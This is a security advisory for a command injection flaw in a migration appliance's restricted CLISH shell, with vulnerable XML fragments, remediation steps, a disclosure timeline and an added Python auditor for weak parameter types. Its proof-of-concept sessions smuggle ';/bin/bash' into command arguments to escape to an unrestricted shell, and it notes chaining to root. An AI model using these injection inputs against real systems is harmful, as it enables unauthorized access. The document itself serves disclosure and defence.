@GregDurys
Created March 2, 2026 17:29
CVE-2025-63911 - Cohesity TranZman CLISH Command Injection

CVE-2025-63911: CLISH Command Injection in Cohesity TranZman

Overview

| Field | Value |
|---|---|
| CVE ID | CVE-2025-63911 |
| CVSS v3.1 | 7.2 (High) |
| Vector | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-78: OS Command Injection |
| Vendor | Cohesity, Inc. |
| Product | TranZman Migration Appliance |
| Affected Versions | Release 4.0 Build 14614 including patch TZM_1757588060_SEP2025_FULL.depot |

Description

Multiple command injection vulnerabilities exist in the CLISH restricted shell of the TranZman appliance. These allow the authenticated admin user to escape the restricted environment and gain unrestricted shell access. The shell escapes require privileged commands to be enabled (through the enable command), resulting in a CVSS 3.1 score of 7.2.

Exploitation

Instance 1: Personality Command Injection

The personality command in config-view.xml specifies a parameter of type STRING which is passed to a shell script:

<!-- /etc/clish/config-view.xml -->
<ACTION>
  sudo /opt/SRLtzm/bin/change_appliance_personality ${personality}
</ACTION>

The STRING type as defined in types.xml performs insufficient sanitisation:

<!-- /etc/clish/types.xml -->
<PTYPE name="STRING"
       pattern="[^\-]+"
       help="String"/>

The regex [^\-]+ accepts any character except hyphens, including shell metacharacters such as semicolons, pipes, and dollar signs.

The following session demonstrates a functional proof of concept that escapes to bash:

$ ssh admin@<IP_ADDRESS>
admin@<IP_ADDRESS>'s password:
**********************************************
*                                            *
*    Tranzman release 4.0 (BUILD 14614)      *
*                                            *
**********************************************
Welcome admin it is Fri 12 Sep 17:26:28 BST 2025
> config
> personality red;id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
> personality red;/bin/bash
[admin@tzm ~]$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Instance 2: Load Media Command Injection

The load_media command in devices-view suffers from the same vulnerability:

<ACTION>
  sudo /opt/SRLtzm/bin/load_media -media ${mediaid} -read -cep 7F000001
</ACTION>

When the user inputs ;/bin/bash;, the resulting command becomes:

sudo /opt/SRLtzm/bin/load_media -media ;/bin/bash; -read -cep 7F000001

Proof-of-concept:

> load_media ;/bin/bash;
Usage: /opt/SRLtzm/scripts/perl/load_media.pl -read | -write | -share -media
MEDIA_ID -cep 0A0A0A0A [ -j jobid ]
[admin@tzm ~]$

Impact

An attacker who has the admin password (either through their regular job function or by guessing the password) could leverage this vulnerability to escape the restricted shell. While the escaped shell runs as admin (uid=1000), the user operates in an unconfined SELinux context and can leverage CVE-2025-63909 (TapeDumper) for privilege escalation to root.

Remediation

Apply Cohesity patches in the following order:

  1. TZM_patch_1.patch
  2. TZM_1760106063_OCT2025R2_FULL.depot

Contact Cohesity support for the latest OVA version with integrated fixes.
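
The following added example (not part of the original advisory and not Cohesity code) audits CLISH XML for the pattern behind both instances above: a regexp PTYPE that admits shell metacharacters and is expanded into an ACTION. The XML is a constructed sample modelled on the quoted fragments; the COMMAND/PARAM wrappers, the SAFE_ID type, the show_job command and the function names are assumptions, and Python's re stands in for the appliance's regex matching, which is assumed to be whole-value.

```python
import re
import xml.etree.ElementTree as ET

SHELL_META = ";|&$`<>()\n"  # characters the shell treats specially
# Constructed samples modelled on the fragments quoted above. The COMMAND/PARAM
# wrappers, the SAFE_ID type and the show_job command are assumptions.
TYPES_XML = r"""<CLISH_MODULE>
  <PTYPE name="STRING" pattern="[^\-]+" help="String"/>
  <PTYPE name="SAFE_ID" pattern="[A-Za-z0-9_]+" help="Identifier"/>
</CLISH_MODULE>"""
VIEW_XML = r"""<CLISH_MODULE>
  <COMMAND name="personality" help="Set personality">
    <PARAM name="personality" ptype="STRING" help="Personality"/>
    <ACTION>sudo /opt/SRLtzm/bin/change_appliance_personality ${personality}</ACTION>
  </COMMAND>
  <COMMAND name="show_job" help="Hypothetical command">
    <PARAM name="jobid" ptype="SAFE_ID" help="Job"/>
    <ACTION>/usr/bin/hypothetical_show_job ${jobid}</ACTION>
  </COMMAND>
</CLISH_MODULE>"""

def local(tag):  # drop an XML namespace prefix such as {http://...}PTYPE
    return tag.rsplit("}", 1)[-1]

def admitted_meta(pattern):
    """Shell metacharacters that a whole-value match of `pattern` lets through."""
    rx = re.compile(pattern)  # Python re used as an approximation of POSIX regex
    return {c for c in SHELL_META if rx.fullmatch("a" + c + "a")}

def audit(types_xml, view_xml):
    """Return (command, param, ptype, chars) for each risky ${param} in an ACTION."""
    weak = {t.get("name"): admitted_meta(t.get("pattern"))
            for t in ET.fromstring(types_xml).iter()
            if local(t.tag) == "PTYPE" and t.get("pattern")
            and t.get("method", "regexp") == "regexp"}
    findings = []
    for cmd in ET.fromstring(view_xml).iter():
        if local(cmd.tag) != "COMMAND":
            continue
        action = "".join(a.text or "" for a in cmd.iter() if local(a.tag) == "ACTION")
        for p in cmd.iter():
            chars = weak.get(p.get("ptype"))
            if local(p.tag) == "PARAM" and chars and "${%s}" % p.get("name") in action:
                findings.append((cmd.get("name"), p.get("name"), p.get("ptype"),
                                 "".join(sorted(chars))))
    return findings

if __name__ == "__main__":
    for f in audit(TYPES_XML, VIEW_XML):
        print("RISK: command=%s param=%s ptype=%s admits=%r" % f)
```

A parameter type reported here needs an allow-list pattern (as SAFE_ID illustrates) before its value reaches a shell command line.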

Timeline

| Date | Event |
|---|---|
| 26 September 2025 | Reported to Cohesity |
| 20 October 2025 | Cohesity confirmed fix in patches |
| 25 December 2025 | Embargo period ended |
| 27 December 2025 | Public disclosure |

Credit

Discovered by Greg Durys, LME
